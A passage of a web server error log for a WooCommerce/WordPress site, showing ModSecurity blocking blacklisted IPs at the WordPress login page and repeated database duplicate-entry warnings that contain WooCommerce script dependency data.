checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:48.331449 2026] [security2:error] [pid 823496:tid 823748] [client 62.60.130.233:63286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "acecomputers.co.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWBmJa08mrtyBNpA4PbuAAAAHg"], referer: https://www.bing.com/
[Tue May 26 16:48:48.667019 2026] [security2:error] [pid 823496:tid 823744] [client 62.60.130.233:57421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "acecomputers.co.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWBmJa08mrtyBNpA4PbvAAAAHQ"]
[Tue May 26 16:48:49.316295 2026] [lsapi:warn] [pid 823496:tid 823700] [client 45.13.225.123:60322] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.316327 2026] [lsapi:warn] [pid 823496:tid 823700] [client 45.13.225.123:60322] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.317186 2026] [security2:error] [pid 823496:tid 823700] [client 45.13.225.123:60322] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBmJa08mrtyBNpA4PbvQAAAEg"]
[Tue May 26 16:48:49.466194 2026] [lsapi:warn] [pid 817651:tid 817829] [client 45.13.225.123:33136] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.467682 2026] [lsapi:warn] [pid 817651:tid 817829] [client 45.13.225.123:33136] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.493561 2026] [lsapi:warn] [pid 817651:tid 817863] [client 45.13.225.123:33216] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.494953 2026] [lsapi:warn] [pid 817651:tid 817863] [client 45.13.225.123:33216] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', 